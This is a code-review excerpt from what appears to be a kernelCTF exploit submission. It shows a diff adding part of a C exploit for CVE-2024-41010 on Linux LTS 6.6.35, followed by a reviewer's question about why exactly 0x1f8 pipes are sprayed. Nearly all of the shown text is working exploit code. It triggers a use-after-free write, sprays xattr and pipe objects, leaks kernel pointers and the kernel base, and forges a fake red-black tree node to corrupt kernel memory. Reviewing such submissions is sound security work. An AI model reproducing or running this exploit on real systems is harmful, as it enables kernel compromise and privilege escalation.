pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c

```diff
@@ -0,0 +1,871 @@
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+        snprintf(value_name, VALUE_NAME_LEN, "security.value%05lu-%s", i, XATTR_PADDING_STR);
+		snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 9, XATTR_PADDING_STR);
+		create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true);
+    }
+}
+
+int run(void)
+{
+	pid_t pid;
+	int pip1[2], pip2[2], pip3[2];
+	char step[10];
+	uint64_t handle_num;
+	int p1;
+	int status1;
+	pthread_t hdr1;
+
+	passer = 0;
+
+	struct regs *sr = save_state();
+
+	pipe(pip1);
+	pipe(pip2);
+	pipe(pip3);
+
+	if(!fork())
+		exit(0);
+
+	cpu_affinity(0);
+	pre_make_mount_dir(TMPFS_MOUNT_POINT);
+	pre_make_xattr_file(XATTR_FILE, 0x10000);
+
+	if (!fork())
+		trigger_uaf_write(pip1, pip2, 0);
+
+	uint64_t *leaks = trigger_spray_chunks(pip1, pip2);
+
+	for(int i=0; i<0x500; i++)
+		release_pipe(glb_pipes[i]);
+
+	if (!leaks)
+	{
+		printf("[-] fail on get xattr node info, cleanup it\n");
+		cleanup();
+		return -1;
+	}
+
+	uint64_t lnode = 0, rnode = 0, attr_name_ptr = 0;
+
+	typedef struct {
+		struct simple_xattr xattr;
+		int fname_idx;
+	} xattr_node_leak;
+
+	xattr_node_leak nodes[0x4000/(0x40/0x8)];
+	int nodes_cnt = 0, nodes_front = 0;
+	for(int i=0; i < 0x4000/(0x40/0x8); i+=0x40/0x8)
+	{
+		if(leaks[0x17 + i] == 0x59 && leaks[0x14 + i] && leaks[0x15 + i] && leaks[0x16 + i] && leaks[0x18 + i])
+		{
+			nodes[nodes_cnt].xattr.rb_node.rb_right = leaks[0x14 + i];
+			nodes[nodes_cnt].xattr.rb_node.rb_left = leaks[0x15 + i];
+			nodes[nodes_cnt].xattr.name = leaks[0x16 + i];
+			nodes[nodes_cnt].fname_idx = leaks[0x18 + i];
+			nodes_cnt++;
+		}
+	}
+
+	printf("[*] total leak cnts: %d\n", nodes_cnt);
+
+	if(nodes_cnt < 5)
+	{
+		printf("[-] fail on get enough xattr node info, cleanup it\n");
+		cleanup();
+		return -1;
+	}
+	if(kbase == 0)
+	{
+		printf("[-] fail on get kbase, cleanup it\n");
+		cleanup();
+		return -1;
+	}
+
+	printf("[+] success, leak xattr and kbase\n");
+
+	cleanup_cg_192();
+
+	passer = 1;
+
+retry_1bit_off:
+	if (!fork())
+		trigger_uaf_write(pip1, pip2, 0);
+
+	generate_fake_rbtree(pip1, pip2, (uint64_t)nodes[nodes_front].fname_idx, 
+									 (uint64_t)nodes[nodes_front].xattr.rb_node.rb_right + 1, 
+									 (uint64_t)nodes[nodes_front].xattr.name, 
+									 (uint64_t)nodes[nodes_front].xattr.rb_node.rb_left, 
+									 (uint64_t)nodes[nodes_front].xattr.rb_node.rb_left - 0x18);
+
+	char file_name[FILENAME_LEN];
+	char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, };
+    char attribute_name[XATTR_VALUE_KMALLOC_CG_8K];
+	snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, nodes[nodes_front].fname_idx);
+
+	printf("[*] try to remove fake xattr\n");
+	if(remove_xattr(file_name, "security.attr", false) < 0)
+	{
+		printf("[-] fail on remove_xattr, cleanup it\n");
+		cleanup2(nodes[nodes_front].fname_idx);
+		nodes_front++;
+		passer = 0;
+		goto retry_1bit_off;
+	}
+
+	struct pipeio *pipes[0x1f8];
```

Comment:
Comment here why did you choose to create exactly `0x1f8` pipes. Is it because of some limitation or making sure you are draining all freelists or ...?